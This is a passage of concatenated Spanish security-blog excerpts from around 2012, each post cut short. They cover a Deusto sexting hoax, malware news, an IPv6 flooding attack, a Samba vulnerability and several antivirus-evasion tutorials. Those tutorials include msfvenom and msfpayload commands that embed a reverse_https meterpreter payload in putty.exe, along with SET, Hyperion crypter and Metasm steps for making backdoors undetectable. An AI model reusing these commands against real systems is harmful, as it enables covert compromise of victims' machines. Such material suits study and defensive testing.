Sexting y hoax sobre alumnos de Deusto

Seguro que todos habréis leído, escuchado en la radio o incluso visto en televisión el gran impacto mediático que está teniendo la noticia de unas supuestas filtraciones de varias fotos de alumnos de la Universidad de Deusto. Pero, ¿son veraces estas noticias o son puramente sensacionalistas? Pues me atrevería a decir más bien lo segundo...

Todos sabemos la fuerza que puede llegar a tener un bulo en Internet u hoax, más aún si tiene un componente de sexting en el que se publican fotos comprometidas.
Hasta el momento de escribir esta entrada todavía se podían descargar algunas de esas presuntas imágenes en 4chan, hasta un total de diez. Desconozco si son todas las que han estado circulando por WhatsApp y por distintas redes sociales, pero un análisis de los metadatos con la FOCA demuestra que algunas fueron tomadas hace bastante tiempo y con terminales o portátiles demasiado viejos, que difícilmente un alumno hubiera manteniendo hasta nuestros días:

 

Número 9 de la revista Hack In The Box


Ya podemos descargar el magazine número 9 de HITB, cuyos contenidos son los siguientes: 
 
Windows Security
- Bot Wars - The Game of Win32/64 System Takeover
- Memory Copy Functions in Local Windows Kernel Exploitation

Mobile Security
- Android Persistent Threats

Hardware Security
- Does the Analysis of Electrical Current Consumption of Embedded Systems could Lead to Code Reversing?

Web Application Security
- To Hack an ASP.Net Site? It is Difficult, but Possible!

Mobile Security
- A Brief Introduction to VEGA

Ocultando entornos virtuales a malware y atacantes

Si recordáis hace tiempo repasamos una serie de técnicas para que nuestro malware de cada día pudiera detectar que está "dentro" de una máquina virtual o en un sandbox y así ejecutar inmediatamente un rutina de escape para dejar con un palmo de narices a los analistas (o al menos a los analistas más noveles).

Ahora vamos a cambiarnos de chaqueta y vamos a ponernos en la piel de quién tiene que realizar el análisis del software malicioso. Si antes la pieza de malware intentaba detectar el entorno dónde estaba para engañarle y no seguir ejecutando sus malignas acciones, ahora es el propio entorno el que intentará engañar al malware y hacerle creer que está campando a sus anchas en el sistema operativo de su víctima inocente.

Para ello nos viene al pelo un breve post de Hexacorn en el que se describen algunas maneras de ocultar que el sistema es realmente una máquina virtual (principalmente VMWare). Por supuesto no son las únicas medidas que se pueden tomar, pero es un excelente comienzo para ocultar ficheros, procesos, servicios y claves de registro de cara a evadir los controles anti-VM de algunos tipos de malware.

Gana un Nexus 7 con la frase más ingeniosa sobre hacking e (in)seguridad informática #MUSIConcursoN7

MUSI, el Máster Universitario en Seguridad de la Información de la Universidad de Deusto, organiza un concurso a través de redes sociales para regalar un Nexus 7 de 16gb a aquel usuario que haga el comentario más gracioso/interesante siempre relacionado con la seguridad. Las bases son muy sencillas:

1.    Para poder ser seleccionable, debe de existir una relación directa entre MUSI y el perfil del concursante en las redes sociales (follower en twitter, “Me gusta” en Facebook y/o seguidor en Google+).

2.    Para participar es necesario que el usuario comparta la publicación en la que se da a conocer el concurso de forma pública y verificable.

3.  También es necesario realizar o compartir una publicación en la red social relacionada con la temática de la seguridad. Para recopilar todas las publicaciones se utilizará el hashtag #MUSIConcursoN7. Todas aquellas publicaciones que no lo lleven no entrarán en el concurso.


Ejemplo: "Cuando un servidor tiene una vulnerabilidad, se puede parchear. Aún no se ha inventado el parche para la estupidez humana  #MUSIConcursoN7@loretahur

Denegacion de servicio en Call Of Duty: Modern Warfare 3

Se ha descubierto una vulnerabilidad en el juego Call Of Duty: Modern Warfare 3 (CoDMW3) que podría provocar una denegación de servicio en los servidores públicos y privados utilizados para el modo multijugador, además de un problema de ejecución de código en el motor gráfico CryENGINE 3.

En la reciente conferencia de seguridad Power of Community (POC2012) de Seúl, varios especialistas de ReVuln presentaron varios fallos de seguridad en múltiples juegos on-line. 

Por ejemplo, ReVuln dice que logró comprometer una computadora explotando un bug en el juego Nexuiz. Sin embargo, la compañía aún no ha publicado detalles sobre las vulnerabilidades encontradas, sólo un video para demostrar que el exploit hecho a medida es funcional. 

De acuerdo con ReVuln, los fallos están dentro de CryENGINE 3, un motor de videojuegos que es usado por Nexuiz y muchos otros juegos. Esto significa que otros juegos que están basados en CryENGINE 3 también podrían ser potencialmente afectados.

Como parte de su presentación, los investigadores de seguridad también demostraron como un 0-day un ataque de denegación de servicio (DoS) al servidor del popular juego de PC Call Of Duty: Modern Warfare 3.

Evasión de antivirus con SET y Powershell

Hoy vamos a ver una interesante característica de SET (Social Engineering Toolkit) que nos permitirá obtener fácilmente un shell remoto evadiendo completamente el antivirus mediante un ataque con Windows PowerShell.

La ventaja de Powershell es que podemos añadir clases personalizadas al framework .NET. Mediante el cmdlet 'Add-Type' podemos compilar código CSharp al vuelo y por lo tanto importar funciones desde cualquier DLL. ¿Y para qué?, pues como el framework .NET no permite referenciar directamente la memoria, podemos importar funciones que si lo hagan, copiar un shellcode y ejecutarlo }:). Veamos como llevarlo a cabo:

Lo primero que haremos es actualizar nuestro Metasploit (msfupdate) y SET:
root@bt:/pentest/exploits/set# ./set-update 
[-] Updating the Social-Engineer Toolkit, be patient...
D    config/set_config.py
U    config/set_config
U    config/update_config.py
U    setup.py
A    src/fasttrack/delldrac.py
U    src/fasttrack/mssql.py
U    src/core/set.py
U    src/core/payloadgen/create_payloads.py
U    src/core/setcore.py
U    src/core/dictionaries.py
U    src/core/menu/text.py
U    src/core/fasttrack.py
U    src/html/spawn.py
U    src/html/Signed_Update.jar.orig
U    src/html/unsigned/verified_sign.py
U    src/html/unsigned/unsigned.jar
D    src/webattack/java_applet
U    src/webattack/multi_attack/multiattack.py
U    src/webattack/harvester/scraper.py
U    src/webattack/harvester/harvester.py
U    src/webattack/browser_exploits/gen_payload.py
D    src/webattack/web_clone/linux
D    src/webattack/web_clone/osx
A    src/webattack/web_clone/applet.txt
A    src/webattack/web_clone/applet.database.old
U    src/webattack/web_clone/applet.database
U    src/webattack/web_clone/cloner.py
U    src/webattack/web_clone/repeater.database
U    src/teensy/powershell_down.pde
A    src/teensy/peensy.pde
U    src/teensy/teensy.py
U    src/phishing/smtp/client/smtp_web.py
U    src/phishing/smtp/client/smtp_client.py
U    src/payloads/exe/shellcodeexec.binary
U    src/payloads/powershell/prep.py
U    src/payloads/set_payloads/downloader.windows
A    src/payloads/set_payloads/pyinjector_args.py
U    src/payloads/set_payloads/shell.py
U    src/payloads/set_payloads/shell.windows
A    src/payloads/set_payloads/pyinjector.binary
U    src/payloads/set_payloads/listener.py
U    set
U    readme/CHANGES
U    readme/CREDITS
Updated to revision 1577.
[*] The updating has finished, returning to main menu..

La página del Senado

Hace unas semanas el Senado español renovaba su página web. Muchos de nosotros nos llevamos las manos a la cabeza cuando vimos el pastizal que les había costado la paginita: 437.000 euros, por suponer una "inversión en democracia". Según los expertos no es mucho dinero para tratarse de una página de una institucion publica...

El proyecto, en el que el Senado lleva trabajando dos años, ha tenido un importe de adjudicación de 437.691,5 euros, incluido el IVA, repartidos entre el coste de la web (274.350 euros), el del buscador (115.404 euros) y el de las páginas temáticas de niños, jóvenes y la visita en 3D (47.937,5 euros). El contrato se formalizó en julio del año pasado y el trabajo tenía que haber estado terminado en seis meses, pero se ha ido retrasado hasta que el resultado se ha considerado bueno.

Un ingeniero anónimo ha creado un clon de la pagina en una semana y sin que le cueste un duro. Parapetado tras el pseudónimo de 'Tijuinem' es el autor del clon funcional de la nueva web del Senado, en la que se invirtieron 437.481 euros del dinero público. 'Tijuinem' explica en la documentación del proyecto que su única intención es demostrar, "por principios", que se podrían haber aprovechado las virtudes del 'open source' para reducir el coste general del desarrollo.

Como es natural, el grueso de la rebaja gira en torno al pago de licencias de software. La web clónica de la cámara alta, ya online aunque sin terminar, se vale de programas tan potentes como MySQL, Apache o LAMP que no solo igualan las prestaciones del mejor software comercial, sino que para muchos expertos las supera en determinados aspectos.

Haciendo el gamberro en intranet & hacking con dos piedras (2ª parte)

Como lo prometido es deuda y en hackplayers, pese a la crisis, se pagan las deudas, dado que la semana pasada os emplazamos a una segunda entrada de "haciendo el gamberro en intranet y hacking con dos piedras" muy gustosamente retomaremos la susodicha entrada.

Aunque hablar de un objetivo para este texto sería algo capcioso, pues dudo que valga para algo o alguien lo lea....XDXDXD en principio lo tiene, pretendemos divertirnos aprendiendo e intentar ver que se pueden hacer las cosas de muchísimas maneras ... incluso con lo justo sin demasiadas herramientas... a lo "old school" como diría un vetusto amigo.

En esta entrada dejaremos a un lado nuestro arsenal preconfigurado y desempolvaremos viejas herramientas que teníamos ya casi olvidadas... Vamos y no me saco el cpc464 porque no tiene tarjeta wireless :P y de paso veremos como pasar unas risillas a costa de nuestros vecinos de red.

En la entrada anterior no mencione ningún tipo de contramedida, pero en esta lo haremos. Desde la modesta opinión del que os habla y como diría mi abuelita "hay que saber hacer de to...!!!!".
La última vez que nos vimos (en el sentido figurado de la frase, claro está),
si mal no recuerdo, estábamos viendo como resetear sesiones establecidas muy a lo MacGyver, pero el objetivo era ver el porqué de las cosas.
También vimos un poco por encima los riesgos de dejar desprotegido el protocolo ARP.


Vamos a empezar si os parece comentando un par de contramedidas y luego seguimos...

Ataques SSRF y sockets: buffet de vulnerabilidades

Imagina que tienes dos sistemas (sistema A y sistema B) que confían entre sí, es decir, que la comunicación entre ellos no está bloqueada por un firewall porque se tienen que transferir datos desde un sistema a otro. El sistema A es, por ejemplo, un portal corporativo accesible desde una red insegura como es Internet. El otro sistema es un ERP al que no se puede acceder directamente desde Internet, pero que confía en el portal corporativo. Este es el esquema típico en una empresa...

La idea de un ataque SSRF (Server Side Request Forgery, no confundir con CSRF) es encontrar algún tipo de servicio vulnerable en el sistema A, que puede reenviar peticiones maliciosas a la red interna y por lo tanto al sistema B. Así es como podemos superar los firewalls y sistemas IDS y explotar sistemas más seguros. Con una vulnerabilidad de este tipo podemos por ejemplo conseguir el escaneo de redes internas, el reenvío de peticiones HTTP, ataques de fuerza bruta contra el backend y, una de las más peligrosas, hacer tunneling XXE (Xml eXternal Entity).

Hace tiempo vimos en el blog un 0-day para una vulnerabilidad XXE en Postgresql de Onsec. Esta vez, vamos a ver la presentación de una ponencia que hicieron sus integrantes, Vladimir Vorontsov y Alexander Golovko, en la conferencia ZeroNights que tuvo lugar en Moscú los pasados 19 y 20 de noviembre, y en la que veréis la aplicación práctica de varios ataques SSRF usando sockets.

Script en Perl para mantener listas de proxies abiertos

Los proxies abiertos (y encadenados) pueden ser útiles para manterner el anonimato en Internet, casi siempre no con muy "buenos" propósitos ;)
¿Cómo encontrar proxies abiertos? Es fácil si sabes cómo... No en serio, ya sabéis que hay un montón de listas disponibles en Internet. Por ejemplo, diariamente se publican listas en pastebin.com. Otros sitios están dedicados al negocio de la recopilación de enormes listas como www.freeproxylists.com o www.xroxy.com e incluso este último proporciona actualizaciones vía RSS (XML). Por supuesto, la mayoría de ellos proponen pagar por sus servicios...

La cuestión aquí es la fiabilidad de los proxies abiertos publicados. xroxy facilita un indicador de fiabilidad (0-100%), pero muchas veces los proxies no están disponibles o rechazan las conexiones.

Xavier Mertens ha publicado un pequeño script en Perl para mantener una lista de proxies abiertos fucnionales. El script se llama oplb (Open Proxies List Builder) y se basa en el agregador PHP de RSS de xroxy.com. Los proxies se almacenan en una base de datos SQLite y el script mediante un cron chequea regularmente su disponibidad mediante el módulo perl WWW:ProxyChecker. Si no quieres obtener nuevos proxies publicados por xroxy.com también tienes un modo manual para generar y mantener tu propia lista:

Troyano utiliza Google Docs para comunicarse con su C&C

Los investigadores de Symantec han descubierto una pieza de malware que se aprovecha de Google Docs para comunicarse con su servidor de comando y control (C&C).

El malware es una versión del troyano Makadocs, que abre una puerta trasera en el ordenador infectado y trata de robar información. En su última versión, este malware utiliza Google Docs como un servidor proxy para conectarse a su C&C.

"Google Docs tiene una función llamada viewer que obtiene los elementos de otra URL y los muestra", escribió en su blog Takashi Katsuki de Symantec. "Básicamente, esta funcionalidad permite al usuario ver una variedad de tipos de archivos en el navegador. Violando las políticas de Google, Backdoor.Makadocs utiliza esta función para acceder a su servidor de C&C".

"Es posible que el autor del malware haya implementado esta funcionalidad en un intento de evitar ser descubierto mediante una conexión directa con el C&C", continuó el investigador. "La conexión con el servidor de Google Docs se cifra usando HTTPS, lo que hace difícil que sea bloqueada localmente. Google podría evitar esta conexión mediante el uso de un firewall."

Recordemos que no es la primera vez que utilizan métodos no tradicionales de comunicación con servidores C&C. Otros artefactos de malware han utilizado Twitter y Facebook para recibir instrucciones...

Haciendo el gamberro en intranet & hacking con dos piedras (1ª parte)

A quién no le ha pasado que, cuando te faltan 5 minutos para descargar ese archivo que parece infinito, se conecta alguien en tu red y te ralentiza la descarga bastante. O estar trabajando con tu compañero y que se te ocurra de repente que sería gracioso entretenerte un poquito "magreándole" sus conexiones. 

Dicen que cuando el diablo se aburre mueve la cola. Y ¿por qué no? si Dios les dió aletas
a los peces sería para nadar...

La verdad que es algo cruel pero muy gracioso ver hasta que punto se desespera el teleco de al lado y te pregunta muy insistentemente "PERO A TI TE VA LA CONEXION?", o ver a tu compañero de laboratorio de informática, ese que aprovecha para chatear con su novia, soltar improperios...


La verdad es que esta entrada tiene un carácter lúdico aunque ayuda a repasar algunos consejos. Como todo, la informática también tiene su lado cómico ;D, todo no va a ser trabajar y trabajar... La gente que tenga este episodio superado (que será mucha) puede quedarse o irse, no le pondremos falta...:D 


En el primer ejemplo, del cual confieso haber echado mano más de una vez y no sólo para divertirme, interviene el protocolo ARP. Para quien no conozca el protocolo Address Resolution Protocol, haré un ínfimo resumen, pues tenemos que tener al menos una vaga idea de cómo funciona ARP si queremos saber a qué estamos jugando.


Cuando una máquina quiere enviar un paquete a otra, lo que hace es simplemente lanzar una pregunta. Para ello se envía un paquete (ARP request) a la dirección de difusión de la red (broadcast (MAC = FF FF FF FF FF FF)) del estilo: "¿Quién tiene esta dirección IP?"


Evasión de antivirus con ejecutables firmados

Continuamos con el estudio de distintas técnicas para la evasión de antivirus. En esta ocasión veremos un caso muy curioso en el que comprobaremos como la simple firma digital de un fichero ejecutable malicioso puede provocar su indetección.

¿Cómo? Pues las políticas de algunos motores de antivirus pueden excluir el análisis de un fichero simplemente por estar firmado para mejorar el rendimiento... si bien es más probable que, al añadir código al fichero durante este proceso, se vean afectadas las (frágiles) detecciones mediante firmas. Veamos los resultados.

Primero y según la Wikipedia, empezamos definiendo la firma de código como "el proceso de firmar digitalmente ejecutables y scripts para confirmar el autor del software y garantizar que el código no ha sido alterado o corrompido desde que fue firmado mediante el uso de un hash criptográfico.".

Las principales herramientas para firmar ejecutables son codesign en Mac OS X y singtool de Mozilla y Microsoft, aunque en esta entrada comenzaremos con Linux probando osslsigncode (OpenSSL-based signcode utility project), una herramienta multiplataforma basada en OpenSSL y libcurl capaz de firmar ficheros EXE/CAB y mediante la cual firmaremos nuestro fichero de pruebas: un ejecutable de Windows al que inyectaremos un payload malicioso con msfvenom:

msfvenom -p windows/meterpreter/reverse_https -f exe -k -x putty.exe LHOST=192.168.249.128 LPORT=443 >evilputty.exe

Crackea redes wifi con tu Android (en modo monitor)

Seguramente a muchos les pasó por la cabeza la idea de crackear redes wifi con su smartphone pero, para nuestra mala suerte, no se podía porque sorprendentemente el modo monitor (modo para esnifar el tráfico Wifi) no se puede encontrar en cualquier dispositivo android (por no decir en todos), ya que el chipset que se utiliza en los dispositivos android (que mayormente son realizadas por Broadcom) no añade el soporte para el modo monitor.

Pero un grupo de investigadores decidieron pasar sus vacaciones viendo la forma de añadir el modo monitor a sus Android (Nexus One y Galaxy S II). En un primer momento compilaron el controlador en modo depuración y se dieron cuenta que el modulo elimina los encabezados 801.11 en Hw, con la cual concluyeron que se necesita hacer un cambio de firmware en sus dispositivos android, así que empezaron a hacerle ingeniería inversa al firmware y después de unas semanas obtuvieron una compresión decente de la recepción de paquetes en el proceso, con lo cual sacaron su primer firmware con el modo monitor añadido.

Salto de restricciones con "clickjacking" en Joomla!

Ajay Singh Negi ha descubierto un problema de seguridad en Joomla! que podría permitir a un atacante eludir restricciones de seguridad y ataques de cross-site request forgery (CSRF) a través de la técnica del "clickjacking".

¿Qué es el Clickjacking? 
El término clickjacking fue acuñado por Jeremiah Grossman y Robert Hansen en 2008 (ya hablamos de el aquí en Hackplayers). También conocido como UI redressing, se resume en lo siguiente: un usuario hace clic sobre un enlace o botón que está viendo y en realidad lo hace sobre otro enlace controlado por terceros. El clickjacking puede ser entendido como una variante del problema de reemplazo confuso
y para referirse a cualquier tipo de técnica que implique el que un usuario interaccione con una web creyendo que en realidad lo está haciendo con otra.
 
CSRF es una técnica que permitiría realizar peticiones HTTP sin una correcta validación. Por ejemplo, imaginemos que un usuario se encuentra validado en una página que necesita autenticación. Desde el navegador, visita otra web que esconde una petición HTTP hacia esa página que necesita validación. Esa petición HTTP, en forma de enlace, se carga por la víctima sin saberlo y realiza una acción sobre la página en la que se encuentra autenticada. Esto sería un fallo de CSRF por parte de la página que necesita autenticación  puesto que no valida correctamente que las peticiones provengan de su propio dominio. Para impedir ésto, las páginas suelen introducir un sistema de control que impide que una petición desde otra web sea válida. A su vez, para eludirlo, los atacantes utilizan técnicas como clickjacking (un término acuñado en 2008), que permite realizar ataques CSRF aunque se hayan implementado ciertas técnicas para evitarlo.

El problema es que Joomlapermite a cualquier usuario realizar acciones a través de peticiones HTTP que no son convenientemente validadas. Si un usuario visita un enlace especialmente manipulado hacia una plataforma Joomla!, se podrían realizar acciones sobre el portal y el atacante podría así eludir restricciones de seguridad. No se han dado más detalles sobre la vulnerabilidad, pero probablemente permitiría que un usuario suplantase a otro sin necesidad de conocer la contraseña.

Grave fallo de seguridad en Skype permitía el secuestro de cuentas

De vez en cuando lees acerca de una vulnerabilidad y te quedas acojonado acongojado. Un sudor frío recorre tu espalda y te sientes un poquito más inseguro. Hablamos de una vulnerabilidad que afectaba al servicio de VoIP de M$, es decir, al archiutilizado Skype. 

Se trataba de un fallo muy tonto que a la postre se ha convertido en una de las brechas de seguridad más grandes conocidas hasta ahora en Skype. Concretamente cualquiera, sin necesidad de grandes conocimientos, podía acceder a una cuenta de Skype de otro usuario tan solo conociendo su dirección de correo electrónico y cambiando la contraseña. 

El procedimiento para conseguirlo se publicó hace dos meses en el foro ruso Xeksec y puede completarse en unos sencillos pasos, eso sí, lo dejamos como PoC porque actualmente y para impedir el secuestro de más cuentas se ha desactivado temporalmente el restablecimiento de contraseña:

Metasploit + Hyperion (PE Crypter) para la indetección de ejecutables maliciosos

Todos sabemos lo fácil que es inyectar un payload en un ejecutable mediante msfvenom (msfpayload + msfencoder)... y también lo fácil que es que el fichero resultante sea detectado por multitud de antivirus.

Utilizar un encoder de Metasploit no es la solución y, de hecho, a veces es mejor no usarlos o es indiferente. Nos encontramos entonces que tenemos que luchar contra la detección de firmas, la heurística y los sandboxes de los antivirus. No hay una técnica única, ni una mejor que otra, simplemente cualquiera es buena si conseguimos un bajo ratio de detección o un binario FUD.

El otro día revisamos la técnica de Assembly Ghost Writing y hoy vamos a ver el funcionamiento de un PE crypter bastante reciente denominado Hyperion.
Este crypter desarrollado por NullSecurity actua como un packer pero, en lugar de ofuscar el payload (scrambling) y encapsularlo con las instrucciones necesarias para desofuscarlo, Hyperion cifra el payload y lo encapsula con una clave AES débil la cual simplemente se rompe por fuerza bruta en tiempo de ejecución. ¿Ingenioso verdad?, vamos a ver su instalación, funcionamiento y resultado en una distribución BackTrack:

1. Descarga e instalación del crypter:

root@bt:~# wget http://nullsecurity.net/tools/binary/Hyperion-1.0.zip
root@bt:~# unzip Hyperion-1.0.zip 
root@bt:~# cd Hyperion-1.0
root@bt:~/Hyperion-1.0# wine /root/.wine/drive_c/MinGW/bin/g++.exe ./Src/Crypter/*.cpp -o crypter.exe
root@bt:~/Hyperion-1.0# ls -l *.exe
crypter.exe  Examples  Fasm  FasmAES-1.0  license.txt  Makefile  Obj  readme.txt  Src
root@bt:~/Hyperion-1.0# ls -las *.exe
568 -rwxr-xr-x 1 root root 580396 2012-11-14 06:29 crypter.exe

Un nuevo informe recuerda la importancia de la seguridad en SCADA y sistemas de control industrial

Un reciente estudio de la empresa Positive Technologies hace algunas afirmaciones sorprendentes: el 40 por ciento de los sistemas SCADA disponibles en Internet pueden ser hackeados fácilmente, la mitad de las vulnerabilidades encontradas permiten la ejecución de código arbitrario en los sistemas destino, un tercio de las vulnerabilidades surgen de malas configuraciones como el uso de contraseñas por defecto y una cuarta parte están relacionados con los usuarios al no instalar actualizaciones de seguridad.

El estudio se basó en un análisis de las vulnerabilidades anunciadas en fuentes como ICS-CERT, Bugtraq, avisos de proveedores y listas similares. Podéis leer el interesante paper aquí.

España, ¿un país ciberdesprotegido?

Las ciberamenazas se ciernen sobre los sistemas clave en una sociedad, hasta el punto de que algunos líderes militares ven las armas informáticas como de destrucción masiva, habiéndolas bautizado como armas de interrupción masiva

El Centro Nacional de Protección de Infraestructuras Críticas contempla hasta doce sectores potencialmente en riesgo: administración, agua, alimentación, energía, espacio, industria nuclear, industria química, instalaciones de investigación, salud, sistema financiero y tributario, transporte, tecnologías de la información y las telecomunicaciones. 
 
A pesar de este escenario de riesgo, son muchos los expertos, como Ángel Gómez de Ágreda, teniente coronel del Ejército del Aire, que consideran que aun "es necesario desarrollar una Estrategia Nacional del Ciberespacio al estilo de otros países de nuestro entorno. Una que vaya más allá del mero entorno de la Defensa y que agrupe a actores públicos y privados de aquellos sectores trascendentales para nuestra seguridad y prosperidad". 
Y es que en España, hasta la Revisión Estratégica de la Defensa de 2003, ni siquiera aparecía en su estrategia el peligro de los ataques cibernéticos. Nuestro país no cuenta con un órgano único al más alto nivel que asuma el valor estratégico de la ciberseguridad, a pesar de que incluso el jefe de esta área de la OTAN advierte de que los ciberataques y el ciberterrorismo suponen la misma amenaza para la Seguridad Nacional que un misil.

Un ataque devastador mediante flooding con mensajes RA en IPv6

Imagina un ataque extremadamente peligroso, en el que un único dispositivo pueda parar la actividad de todas las máquinas de una red local. Estos ataques existen y son posibles gracias a diversas vulnerabilidades de flooding en IPv6 mediante mensajes RA (Router Advertisement)

La primera de ellas fue reportada hace ya dos años (http://www.securityfocus.com/bid/45760/info) y todavía afectan a M$ Windows XP, Vista, Windows 7, Server 2008 y a versiones antiguas de Solaris, OS X, FreeBSD/NetBSD (estos últimos si parchearon) e incluso a las consolas XBox y PS3.

Para probarla puedes ejecutar flood_router6 dentro de la suite de ataque thc-ipv6 (se incluye por defecto en BackTrack), o también mediante scapy o npg.

El segundo ataque, publicado recientemente y aún más potente, se aprovecha de la característica DAD (Duplicate Address Detection) de ICMPv6 y podemos encontrarlo también en la versión 2 de thc-ipv6: dos-new-ip6.

Quemar despues de leer

Quien no se acuerda de la ya mítica frase "este mensaje se auto-destruirá en 30 segundos"... Uno de los grandes peligros de Internet es que, como nuevo sistema de comunicación, mucha gente aún no es completamente consciente de los peligros que conlleva poner enormes cantidades de información personal en servidores sobre los que no tenemos ningún control.

Hoy por hoy existen infinidad de herramientas que de forma automática se dedican a recopilar información personal como por ejemplo MALTEGO o la FOCA, que explotan la red buscando información almacenada en servidores, caché, material no indexado, etc.

Esto supone una grave amenaza a nuestra intimidad, pudiendo hacer pública información sensible. Sin darnos cuenta nosotros mismos vamos dejando miguitas de pan que un astuto enemigo puede ir recogiendo hasta llenar la cesta de nuestra desdicha... Ante esto no es descabellado pensar en una autopolítica de gestión de nuestra información y tomar medidas tales como cifrar mensajes o, por qué no, generar mensajes que se auto-destruyan a lo inspector Gadget. 

Hay herramientas y websites que nos permiten llevar a la practica esta medida de seguridad extra para con nuestra información, tales como:
 

CVE-2012-1182: Ejecución de código remoto en Samba

A petición popular y hartos ya de meterle manilla al pobrecito queso de gruyer (wws), vamos a ver como llevar a cabo la explotación en otras plataformas.
Para ver esto, hemos decidido poner en el ojo del huracán mi distribución Linux preferida: Debian. Por si hay alguien de otro planeta que no la conozca:

Debian o Proyecto Debian es una comunidad conformada por desarrolladores y usuarios que mantiene un sistema operativo GNU basado en software libre.

Nació como una apuesta por separar en sus versiones el software libre del software no libre. El modelo de desarrollo del proyecto es ajeno a motivos empresariales o comerciales, siendo llevado adelante por los propios usuarios, aunque cuenta con el apoyo de varias empresas en forma de infraestructuras. 

Debian no vende directamente su software, lo pone a disposición de cualquiera en Internet, aunque sí permite a personas o empresas distribuirlo comercialmente mientras se respete su licencia.
La comunidad de desarrolladores del proyecto cuenta con la representación de Software in the Public Interest, una organización sin ánimo de lucro que da cobertura legal a varios proyectos de software libre.
Es bien sabido que muchísimas distribuciones se basan en este gran SO.

Bueno tras este breve apunte vamos a lo que nos interesa. Para empezar a meter mano a Debian vamos a aprovecharnos de una vulnerabilidad en la implementación libre del protocolo de archivos compartidos de Microsoft Windows: SAMBA.

Concretamente se dio a conocer en el mes de abril (CVE-2012-1182) y puede permitir a un atacante ejecutar código remoto, por ejemplo una shell, desde una conexión totalmente anónima y como usuario root. Esto es especialmente crítico en entornos donde se comparte recursos con acceso a Internet.

Las versiones comprometidas por la vulnerabilidad son: 
Samba 3.x anteriores a 3.4.16, 3.5.x anteriores a 3.5.14 y 3.6.x anteriores a 3.6.

Metasploit + Metasm (Ghost Writing ASM) para crear un backdoor indetectable

Normalmente crear un backdoor con Metasploit es sinónimo de detección por parte de la mayoría de AV, incluso utilizando el encoder polimórfico shikata_ga_nai. 

El siguiente método que vamos a ver en esta entrada se denomina Assembly Ghost writing y consiste en modificar un binario malicioso reescribiendo el código ensamblador del payload del exploit generado con Metasploit. 

El resultado es un fichero FUD (completamente indetectable), o al menos con un ratio bajo de detección, por medio del cual un atacante podría obtener una sesión en la máquina de la víctima de forma silenciosa.

En nuestras pruebas utilizaremos BT5R3 con metasploit v4.5.0-dev (atacante) y Win7 con AV McAfee (víctima). El procedimiento es muy sencillo:

1º Creamos el ejecutable malicioso en formato con msfpayload.

root@bt:/home/pruebas# msfpayload windows/meterpreter/reverse_https LHOST=192.168.249.128 LPORT=443 R > binario.raw
root@bt:/home/pruebas# file binario.raw 
binario.raw: data

2º Preparamos metasm (http://metasm.cr0.org/)

root@bt:/home/pruebas# cd /opt/metasploit/msf3/lib/metasm
root@bt:/opt/metasploit/msf3/lib/metasm# cp -a metasm.rb metasm /usr/lib/ruby/1.9.2

3º Desensamblamos el fichero binario:

root@bt:/home/pruebas# ruby /opt/metasploit/msf3/lib/metasm/samples/disassemble.rb raw_binary > codigo.asm

Lista de sitios web que recopilan malware


En KernelMode.info, un foro para la exploración del modo-kernel que os recomiendo que visitéis, podemos encontrar una lista de recursos que sirven malware y que pueden interesarnos para obtener muestras para un posterior análisis. Usarlos con precaución:

El ezine #4 de Hack The Planet compromete a Imageshack, Symantec, ZPanel y a varios simpatizantes de Anonymous

Esta mañana Hack The Planet (HTP) ha publicado su ezine número 4 con información de las incursiones en los sitios web del servicio de imágenes Imageshack y el antivirus Symantec, además de un exploit 0-day para la pasarela de pago de Paypal el panel de control de hostings ZPanel y detalles de información personal de varios seguidores incautos de Anonymous.
Los datos filtrados contienen un montón de información de los servidores comprometidos, así como todos los exploits utilizados y vulnerabilidades encontradas y muchos ya lo asocian a los ataques de Anonymous que han comenzado hoy #Nov5.

Podéis encontrar las razones y todo el detalle en esta agradable e interesante lectura: http://pastebin.com/jhLt7s83


Fuente: Imageshack, Symantec hacked & ZPanel 0 day by HTP ( Hack The Planet )  
Updated: first edit i made a mistake and stated that paypal was the victim of the 0 day when it was infact ZPanel. Sorry for any inconvenience or misleading information.

¿Te han robado tu Android? AndroidLost te ayudará

En España se roban al año más de 400.000 teléfonos móviles. Los carteristas han dejado su principal negocio y ahora se dedican al robo de móviles de última generación. Las compañías telefónicas han dejado de subvencionar los terminales y de regalar los teléfonos más sofisticados. Por estos motivos, se ha disparado su precio en el mercado negro. 


Si por desgracia esto nos sucediera, a parte del terminal, el caco tiene en su poder mucha información de nuestra persona...

Y nosotros ¿¿qué tendríamos?? nada de nada..

Es aquí donde entra en juego Android lost...
Android lost es una aplicación para dispositivos móviles Android que te permite localizar tu teléfono móvil desde una pagina web y obtener el  control remoto de tu dispositivo..

Hoy vamos a ver algunas de las opciones que nos brinda esta herramienta que cuanto menos puede mitigar la desgracia....

INSTALACION:

Descarga e instala Android Lost desde Google Play (antes Android Market) (si no sabes cómo haz clic aquí)

Un grupo de Anonymous publica el código fuente del kernel de VMware ESX Server

El grupo de Anonymous "Stun" ha publicado el código fuente del kernel de VMware ESX Server según anunciaban en su tweet "WILD LEAKY LEAK. FULL VMware ESX Server Kernel LEAKED LINK #Anonymous #AntiSec". 


La razón de este leak es que VMware parece seguir desarrollando sin tener en cuenta buenas prácticas para la seguridad: "Jodiendo gente y vendiendo mierda. Pero ya es hora de que Anonymous finalmente se pronuncie. Por su puesto VMware intentará hacer creer que se trata de un kernel viejo y no se utiliza en sus productos recientes. Pero gracias a Dios, todavía hay cosas como la ingeniería inversa que desmostrará la verdad".

En concreto es un torrent de 1.89 MB titulado "VMware ESX Server Kernel LEAKED" y según "Stun" es una versión original de 1998-2004 todavía utilizada en algunos productos...


Fuente: Anonymous leaks VMware ESX Server Kernel source code

¿Te sientes como James Bond? Participa en el último #sophospuzzle

Si os suena el hashtag #sophospuzzle seguro que ya habéis visto divertidos retos en los que se ha pedido encontrar la ubicación de un restaurante a partir de una foto de su menú, descifrar un mensaje oculto de una chica con un tatuaje de un dragón  y elaborar un enigma cifrado por medio de fechas de cumpleaños. 

En esta ocasión, el tema es Skyfall y Bond, James Bond. Vas a manejar un mensaje de otro agente, descodificar un archivo de datos de la computadora robada M, y desentrañar un lugar secreto - todo un día de trabajo para el agente mejor vestido del mundo.

Para empezar con el rompecabezas, ponte tu esmoquin, pide un Martini y únete a Bond en la mesa de dados (atentos a esta pista y a la imagen de algunos que ya han solucionado la primera fase del reto). Aplica un poco de pensamiento lateral y un poco de personalización en motores de búsqueda para encontrar la manera de convertir el texto abajo en una dirección URL:

44516 54221 43313 slash SHAKE DON'T STIR

Primeros exploits de día 0 para Windows 8

